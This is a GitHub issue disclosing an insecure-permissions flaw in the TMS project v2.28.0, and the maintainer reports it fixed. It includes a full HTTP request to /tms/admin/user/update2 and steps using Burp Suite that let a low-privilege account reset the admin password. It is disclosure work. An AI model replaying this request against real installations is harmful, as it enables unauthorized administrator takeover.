Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a Insecure Permissions vulnerability exists in tms #16

Closed
afeng2016-s opened this issue Feb 24, 2022 · 1 comment
Closed

There is a Insecure Permissions vulnerability exists in tms #16

afeng2016-s opened this issue Feb 24, 2022 · 1 comment

Comments

@afeng2016-s
Copy link

[Suggested description]
There is an ultra vires vulnerability in the function of modifying personal information in TMS.The vulnerability originates from / TMS / admin / user / Update2. The administrator account and password can be modified beyond his authority by modifying the packet parameters.

[Vulnerability Type]
Insecure Permissions

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[Affected Component]
POST /tms/admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 66
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645604534
Connection: close

username=admin&password=88888888&name=admin&mail=admin%40google.com&=

[Attack Type]
Remote

[Vulnerability proof]

1.Access with test account http://localhost:8080/tms/admin
image

2.In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password: 88888888.
image
Now I log in to the test account to try to change the information and password of the admin account.

3.Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window.
image
image

4.Because there is no need to verify the user's original password, you can set the new password directly. Here, the password is set as change123 in the form submission, and other information will not be changed. Open the burpsuite packet capturing agent - > click the confirm submit button.
image

5.Modify the packet capture data, as shown in the following figure.
image

6.Click forwad to finish the modification.
image

The information of viewing admin has changed.Vulnerability recurrence completed.
image

@xiweicheng
Copy link
Owner

yes, fixed. 👍
image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants